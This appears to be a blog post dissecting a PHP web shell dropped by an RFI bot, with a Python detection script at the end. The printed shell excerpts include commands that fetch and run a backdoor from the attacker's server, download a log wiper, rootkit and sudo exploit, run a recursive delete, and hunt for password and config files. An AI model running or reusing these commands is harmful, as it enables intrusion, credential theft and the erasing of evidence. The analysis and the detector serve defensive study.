Casper RFI crack bot – Part 4

sh.txt
This one also looks juicy!
Another PHP file:
<?php
$sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20=";
$sh_ver = "0.0 01.01.2010";
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = "http://xxxxxx.ru/config/";
$html_start = ''.
'<html><head>
<title>'.getenv("HTTP_HOST").' - '.$sh_name.'</title>
<style type="text/css">
<!--
What are you up to with this one?
We have lots of toys to play with.
//Authentication
$login = "";
$pass = "";
$md5_pass = ""; //Password already hashed with md5. If empty, md5($pass).
$host_allow = array("*"); //Example: array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted Area"; //HTTP-Auth message
$accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
$gzipencode = TRUE;
$updatenow = FALSE; //If TRUE, update the shell now.
$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";
$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
$filestealth = TRUE; //TRUE: do not change modification and access times.
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$log_email = "xxxxx_xxx@yahoo.com"; //email the logs are sent to.
$sort_default = "0a"; //Sorting, 0 - column number. "a"scending or "d"escending
$sort_save = TRUE; //If TRUE, save the sort position using cookies.
$sess_cookie = "c99shvars"; //Cookie variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Delete copied files after they have been pasted
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
  $disablefunc = str_replace(" ","",$disablefunc);
  $disablefunc = explode(",",$disablefunc);
}
A few functions for checking and reporting disk usage.
Now this is worth tracking down.
//milw0rm search
$Lversion = php_uname(r);
$OSV = php_uname(s);
if(eregi("Linux",$OSV))
{
  $Lversion=substr($Lversion,0,6);
  $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
}
else
{
  $Lversion=substr($Lversion,0,3);
  $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
}
//End of milw0rm search
I wish milw0rm was still around so we could see what those are for 🙁
Here is one of a few things that are encoded: $back_connect_pl, a base64 blob that decodes to a Perl back-connect script.
And a few others, no point in sharing 🙂
We are sure reporting back on a lot of things.
$cmdaliases = array(
  array("", "ls -al"),
  array("Find all suid files", "find / -type f -perm -04000 -ls"),
  array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
  array("Find all sgid files", "find / -type f -perm -02000 -ls"),
  array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  array("Find config.inc.php files", "find / -type f -name config.inc.php"),
  array("Find config* files", "find / -type f -name \"config*\""),
  array("Find config* files in current dir", "find . -type f -name \"config*\""),
  array("Find all writable folders and files", "find / -perm -2 -ls"),
  array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
  array("Find all writable folders", "find / -type d -perm -2 -ls"),
  array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
  array("Find all service.pwd files", "find / -type f -name service.pwd"),
  array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
  array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
  array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  array("Find all .bash_history files", "find / -type f -name .bash_history"),
  array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
  array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  array("List file attributes on a Linux second extended file system", "lsattr -va"),
  array("Show opened ports", "netstat -an | grep -i listen")
);
OK now this is nice!
$cmdaliases2 = array(
  array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"),
  array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"),
  array("-----",""),
  array("Logged in users","w"),
  array("Last to connect","lastlog"),
  array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
  array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
  array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
  array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
  array("CPU Info","cat /proc/version /proc/cpuinfo"),
  array("Is gcc installed ?","locate gcc"),
  array("Format box (DANGEROUS)","rm -Rf"),
  array("-----",""),
  array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
  array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
  array("Run WIPELOGS PT3","./zap2"),
  array("-----",""),
  array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
  array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
  array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
);
Looking for a few more things: we pull down a log wiper (zap2) from Packet Storm, grab RatHole 1.2 from the same place, and a local sudo exploit from SecurityFocus.
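For anyone who finds one of these on a web server, here is a small triage script (added here, not code from the post or from the shell's authors) that looks for the fx29sh/c99 markers seen above and decodes long base64 literals such as $back_connect_pl, tolerating the stray whitespace that copy/paste leaves in them. The sample PHP input and the stand-in payload are constructed for the demo; the marker list and scoring threshold are my own choices.

```python
import base64
import re

# Indicators lifted from the fx29sh/c99-style shell dissected in this post.
SHELL_MARKERS = {
    "c99shvars": "c99-family session cookie name",
    "fx29sh_update.php": "fx29sh self-update URL",
    "fx29sh_source.txt": "fx29sh source-fetch URL",
    "$back_connect_pl": "embedded back-connect payload variable",
    "milw0rm.com/search.php": "kernel-version exploit lookup",
    "disable_functions": "probes PHP disable_functions",
}
# A double-quoted PHP literal that looks like base64. Whitespace is allowed
# because pasted blobs are often wrapped, exactly like the one in this post.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/=\s]{40,})"')
INTERPRETER_HINTS = (b"#!/usr/bin/perl", b"#!/bin/sh", b"#!/bin/bash", b"<?php")


def decode_blobs(php_source: str) -> list:
    """Decode every long base64-looking literal and note what it starts with."""
    found = []
    for m in B64_LITERAL.finditer(php_source):
        try:
            data = base64.b64decode(m.group(1))  # validate=False drops whitespace
        except ValueError:  # binascii.Error is a ValueError: not really base64
            continue
        kind = next((h.decode() for h in INTERPRETER_HINTS if data.startswith(h)), None)
        found.append({"offset": m.start(), "length": len(data),
                      "starts_with": kind, "preview": data[:32]})
    return found


def scan(php_source: str) -> dict:
    """Each marker hit and each blob that decodes to a script counts one point."""
    markers = [desc for needle, desc in SHELL_MARKERS.items() if needle in php_source]
    blobs = decode_blobs(php_source)
    hits = len(markers) + sum(1 for b in blobs if b["starts_with"])
    return {"markers": markers, "blobs": blobs, "suspicious": hits >= 2}


# Constructed sample: a harmless stand-in, NOT the real back-connect payload.
BACKCONNECT_PLAIN = b"#!/usr/bin/perl\nuse Socket;\n# constructed stand-in for the demo\n"
BACKCONNECT = base64.b64encode(BACKCONNECT_PLAIN).decode()
SAMPLE = (
    '$sess_cookie = "c99shvars"; //Cookie variable name\n'
    '$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";\n'
    '$disablefunc = @ini_get("disable_functions");\n'
    '$back_connect_pl = "' + BACKCONNECT[:30] + " " + BACKCONNECT[30:] + '";\n'
)
BENIGN = '<?php echo "Nothing to see here, just a normal page";'

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, scan(src))
```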
This is a big one, I will have to continue this tomorrow.